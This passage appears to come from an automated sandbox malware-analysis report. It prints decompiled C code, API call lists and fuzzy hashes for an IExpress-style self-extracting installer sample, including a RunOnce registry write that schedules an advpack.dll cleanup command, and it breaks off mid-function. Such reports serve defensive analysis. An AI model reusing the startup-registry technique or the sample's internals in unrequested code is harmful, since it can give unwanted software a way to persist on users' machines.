                                                                                                                                                                                                                                            0x008d3644
                                                                                                                                                                                                                                            0x008d351b
                                                                                                                                                                                                                                            0x008d351d
                                                                                                                                                                                                                                            0x008d354f
                                                                                                                                                                                                                                            0x008d3553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d355f
                                                                                                                                                                                                                                            0x008d3565
                                                                                                                                                                                                                                            0x008d357c
                                                                                                                                                                                                                                            0x008d3581
                                                                                                                                                                                                                                            0x008d3584
                                                                                                                                                                                                                                            0x008d359b
                                                                                                                                                                                                                                            0x008d35a1
                                                                                                                                                                                                                                            0x008d35a7
                                                                                                                                                                                                                                            0x008d35ad
                                                                                                                                                                                                                                            0x008d35b3
                                                                                                                                                                                                                                            0x008d35b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d35b8
                                                                                                                                                                                                                                            0x008d3586
                                                                                                                                                                                                                                            0x008d3588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3590
                                                                                                                                                                                                                                            0x008d3524
                                                                                                                                                                                                                                            0x008d3535
                                                                                                                                                                                                                                            0x008d3541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 008D3535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 008D3541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 008D355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(008D1140,00000000,00000020,00000004), ref: 008D3590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D35C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 008D35F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 008D35F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 008D3610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 008D3617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D3623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 008D3637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 008D3671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 6777402d5705c2cb4d04b14c4a36f0a97befd3a56efe16eb7044a8272a7fbc93
                                                                                                                                                                                                                                            • Instruction ID: 59e03e43b136e1dc344e5eec0cf297c2f0c7ee01b66753df03137453f3bef939
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6777402d5705c2cb4d04b14c4a36f0a97befd3a56efe16eb7044a8272a7fbc93
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35318EB1242301BBDB241F25FC4DE2A3B79F799B51F24472BF612D53A0CB758A00DA56
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E008D4224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E008D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0x8d88c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0x8d87a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0x8d8598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E008D4200;
                                                                                                                                                                                                                                            					_v28 = 0x8d88c0;
                                                                                                                                                                                                                                            					 *0x8da288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0x8da288(_t32, 0x8d88c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0x8d88c0 != 0) {
                                                                                                                                                                                                                                            							E008D1680(0x8d87a0, 0x104, 0x8d88c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8da288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0x8d87a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0x8d88c0);
                                                                                                                                                                                                                                            					_t61 = 0x8d88c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0x8d88c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0x8d88c0; // 0x11b1181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0x8d88c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0x8d88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x008d4234
                                                                                                                                                                                                                                            0x008d423c
                                                                                                                                                                                                                                            0x008d4240
                                                                                                                                                                                                                                            0x008d43b2
                                                                                                                                                                                                                                            0x008d43b7
                                                                                                                                                                                                                                            0x008d43c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d43c5
                                                                                                                                                                                                                                            0x008d424c
                                                                                                                                                                                                                                            0x008d4252
                                                                                                                                                                                                                                            0x008d4257
                                                                                                                                                                                                                                            0x008d43a4
                                                                                                                                                                                                                                            0x008d43a5
                                                                                                                                                                                                                                            0x008d43ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d43ab
                                                                                                                                                                                                                                            0x008d4263
                                                                                                                                                                                                                                            0x008d4269
                                                                                                                                                                                                                                            0x008d426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d427a
                                                                                                                                                                                                                                            0x008d4280
                                                                                                                                                                                                                                            0x008d4285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d428d
                                                                                                                                                                                                                                            0x008d4293
                                                                                                                                                                                                                                            0x008d42e6
                                                                                                                                                                                                                                            0x008d42e9
                                                                                                                                                                                                                                            0x008d42ef
                                                                                                                                                                                                                                            0x008d42f4
                                                                                                                                                                                                                                            0x008d42f7
                                                                                                                                                                                                                                            0x008d4300
                                                                                                                                                                                                                                            0x008d4307
                                                                                                                                                                                                                                            0x008d430e
                                                                                                                                                                                                                                            0x008d4315
                                                                                                                                                                                                                                            0x008d431c
                                                                                                                                                                                                                                            0x008d4322
                                                                                                                                                                                                                                            0x008d4326
                                                                                                                                                                                                                                            0x008d432d
                                                                                                                                                                                                                                            0x008d432d
                                                                                                                                                                                                                                            0x008d432f
                                                                                                                                                                                                                                            0x008d4334
                                                                                                                                                                                                                                            0x008d4343
                                                                                                                                                                                                                                            0x008d4349
                                                                                                                                                                                                                                            0x008d434d
                                                                                                                                                                                                                                            0x008d4354
                                                                                                                                                                                                                                            0x008d4354
                                                                                                                                                                                                                                            0x008d435d
                                                                                                                                                                                                                                            0x008d436e
                                                                                                                                                                                                                                            0x008d436e
                                                                                                                                                                                                                                            0x008d437d
                                                                                                                                                                                                                                            0x008d4383
                                                                                                                                                                                                                                            0x008d4387
                                                                                                                                                                                                                                            0x008d438e
                                                                                                                                                                                                                                            0x008d438e
                                                                                                                                                                                                                                            0x008d4387
                                                                                                                                                                                                                                            0x008d4391
                                                                                                                                                                                                                                            0x008d4399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4295
                                                                                                                                                                                                                                            0x008d429f
                                                                                                                                                                                                                                            0x008d42a5
                                                                                                                                                                                                                                            0x008d42aa
                                                                                                                                                                                                                                            0x008d42aa
                                                                                                                                                                                                                                            0x008d42ad
                                                                                                                                                                                                                                            0x008d42ad
                                                                                                                                                                                                                                            0x008d42af
                                                                                                                                                                                                                                            0x008d42b0
                                                                                                                                                                                                                                            0x008d42b6
                                                                                                                                                                                                                                            0x008d42c2
                                                                                                                                                                                                                                            0x008d42c8
                                                                                                                                                                                                                                            0x008d42ce
                                                                                                                                                                                                                                            0x008d42e4
                                                                                                                                                                                                                                            0x008d42e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d42ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 008D4236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 008D424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 008D4263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 008D427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,008D88C0,?,00000001), ref: 008D429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D88C0,011B1181,?,00000001), ref: 008D42C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D88C0,00000000,?,00000001), ref: 008D42D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008D4391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008D43A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 5e52d76f469cd442be8a59de8d4b6008f78286214eab3f96f60079da5ffc5618
                                                                                                                                                                                                                                            • Instruction ID: 9718a3c7ff2526b55b81afaaeb862cc369d97f1c6691b5b3d92e7d3721aa0ff0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e52d76f469cd442be8a59de8d4b6008f78286214eab3f96f60079da5ffc5618
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941E074A01244EFDB15ABB9DC88AAE7BB4FB49344F28136BE941E3391CB748C05C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E008D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E008D658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E008D658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0x8d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E008D1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x008d2773
                                                                                                                                                                                                                                            0x008d277e
                                                                                                                                                                                                                                            0x008d2785
                                                                                                                                                                                                                                            0x008d278a
                                                                                                                                                                                                                                            0x008d278d
                                                                                                                                                                                                                                            0x008d2790
                                                                                                                                                                                                                                            0x008d2792
                                                                                                                                                                                                                                            0x008d2798
                                                                                                                                                                                                                                            0x008d279d
                                                                                                                                                                                                                                            0x008d28b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d27a3
                                                                                                                                                                                                                                            0x008d27a3
                                                                                                                                                                                                                                            0x008d27af
                                                                                                                                                                                                                                            0x008d27c2
                                                                                                                                                                                                                                            0x008d27c8
                                                                                                                                                                                                                                            0x008d27cd
                                                                                                                                                                                                                                            0x008d27d5
                                                                                                                                                                                                                                            0x008d28b7
                                                                                                                                                                                                                                            0x008d28b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d27db
                                                                                                                                                                                                                                            0x008d27dd
                                                                                                                                                                                                                                            0x008d28aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d27e3
                                                                                                                                                                                                                                            0x008d27e3
                                                                                                                                                                                                                                            0x008d27ec
                                                                                                                                                                                                                                            0x008d27f8
                                                                                                                                                                                                                                            0x008d2803
                                                                                                                                                                                                                                            0x008d280b
                                                                                                                                                                                                                                            0x008d2831
                                                                                                                                                                                                                                            0x008d28c3
                                                                                                                                                                                                                                            0x008d28c9
                                                                                                                                                                                                                                            0x008d28cd
                                                                                                                                                                                                                                            0x008d2837
                                                                                                                                                                                                                                            0x008d285a
                                                                                                                                                                                                                                            0x008d285c
                                                                                                                                                                                                                                            0x008d2865
                                                                                                                                                                                                                                            0x008d2892
                                                                                                                                                                                                                                            0x008d2895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2867
                                                                                                                                                                                                                                            0x008d2878
                                                                                                                                                                                                                                            0x008d288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d287a
                                                                                                                                                                                                                                            0x008d2880
                                                                                                                                                                                                                                            0x008d2885
                                                                                                                                                                                                                                            0x008d2897
                                                                                                                                                                                                                                            0x008d2899
                                                                                                                                                                                                                                            0x008d2899
                                                                                                                                                                                                                                            0x008d2878
                                                                                                                                                                                                                                            0x008d2865
                                                                                                                                                                                                                                            0x008d28a0
                                                                                                                                                                                                                                            0x008d28bf
                                                                                                                                                                                                                                            0x008d28c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d28c1
                                                                                                                                                                                                                                            0x008d2831
                                                                                                                                                                                                                                            0x008d27dd
                                                                                                                                                                                                                                            0x008d27d5
                                                                                                                                                                                                                                            0x008d28e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(12CB0CEF,00000000,00000000,00000000), ref: 008D27A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 008D27B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 008D27BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D28A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008D28AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D28B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008D27E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 96be1d58c30e8466ad1f60a5d55b8c9dddabeea09d43f79563ff5f4317d6167f
                                                                                                                                                                                                                                            • Instruction ID: 93d3226a4455a7c67aa36d6f06dae70918b13fb2c1c4b4ebad175535d95daeae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96be1d58c30e8466ad1f60a5d55b8c9dddabeea09d43f79563ff5f4317d6167f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3418071A0012CAFDB249B64DC85AFAB7BDFF65710F1042ABF549D2210DB708E859FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E008D2267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x8d8530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E008D658A( &_v268, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E008D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
